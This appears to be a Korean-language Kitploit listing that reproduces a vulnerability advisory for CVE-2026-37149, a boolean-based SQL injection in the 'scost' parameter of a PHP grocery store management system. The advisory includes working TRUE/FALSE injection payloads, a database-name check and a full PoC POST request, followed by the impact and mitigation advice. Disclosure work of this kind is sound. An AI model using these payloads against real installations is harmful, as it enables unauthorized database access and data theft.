Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-37149 — CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0의 search_products.php에서 scost 파라미터의 SQL 인젝션 취약점. | Kitploit
도구/GitHubGitHub/pateldhyeyit/cve-2026-37149
Vulnerability AnalysisWeb Application ExploitationInformation GatheringPenetration TestingLearning & EducationDatabase Security
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0의 search_products.php에서 scost 파라미터의 SQL 인젝션 취약점.

저장소 보기
222개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2026-37149 GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0의 SQL 인젝션

개요

  • CVE ID: CVE-2026-37149
  • 취약점 유형: SQL 인젝션 (CWE-89)
  • 심각도: 높음(High)
  • 발견자: Dhyey Patel

설명

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0에는 "/grocery/search_products.php"의 "scost" 매개변수에 SQL 인젝션 취약점이 존재합니다.

애플리케이션은 SQL 쿼리에 입력값을 포함시키기 전에 사용자 입력을 제대로 검증하지 못합니다. 공격자는 취약한 매개변수를 통해 조작된 SQL 표현식을 주입하고 백엔드 데이터베이스 쿼리를 조작할 수 있습니다.

성공적으로 악용될 경우 민감한 데이터베이스 정보에 대한 무단 접근 및 임의 SQL 문 실행이 가능할 수 있습니다.

영향을 받는 제품

  • 제품: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN
  • 버전: v1.0
  • 공급업체 저장소:

https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

영향을 받는 구성 요소

  • "/grocery/search_products.php"
  • POST 매개변수: "scost"

공격 유형

원격(Remote)

공급업체 정보

저장소 소유자가 유지 관리하는 오픈소스 프로젝트: https://github.com/anirudhkannanvp

기술적 세부 사항

이 취약점은 Boolean 기반 SQL 인젝션 기법을 사용하여 확인되었습니다.

TRUE 조건 페이로드

root@kitploit:~
-1 OR 3*2*1=6 AND 000483=000483 --

FALSE 조건 페이로드

root@kitploit:~
-1 OR 3*2*0=6 AND 000483=000483 --

주입된 조건이 TRUE 또는 FALSE로 평가되는지에 따라 애플리케이션 응답이 달라졌으며, 이를 통해 SQL 인젝션을 확인했습니다.

추가 테스트를 통해 다음을 포함한 SQL 함수의 성공적인 실행이 확인되었습니다.

root@kitploit:~
SELECT database()

반환된 데이터베이스 이름은 다음과 같습니다.

root@kitploit:~
grocery

이는 취약한 매개변수를 통해 임의 SQL 쿼리를 실행할 수 있음을 입증합니다.

개념 증명(PoC)

요청

root@kitploit:~
POST /grocery/search_products.php HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded

scategory=1&
scost=-1 OR 3*2*1=6 AND 000483=000483 -- &
sitem_name=test&
spid=1&
submit=Search%20For%20products

결과

주입된 Boolean 조건에 따라 응답이 달라지며, "scost" 매개변수의 SQL 인젝션을 확인할 수 있습니다.

영향

잠재적 영향은 다음과 같습니다.

  • 데이터베이스 열거
  • 민감한 정보 노출
  • 인증 우회
  • 데이터 추출
  • 데이터베이스 레코드 수정

완화 방법

개발자는 다음을 수행해야 합니다.

  1. 준비된 명령문(Prepared Statement)을 사용하십시오.
  2. 매개변수화된 SQL 쿼리를 사용하십시오.
  3. 숫자 입력 매개변수를 검증하십시오.
  4. 서버 측 입력 검증을 구현하십시오.
  5. 사용자 제어 입력값을 SQL 문에 직접 연결하는 것을 피하십시오.

참고 자료

OWASP SQL Injection https://owasp.org/www-community/attacks/SQL_Injection

MITRE CVE 프로그램 https://www.cve.org

크레딧

발견 및 보고자: Dhyey Patel

도구 다운로드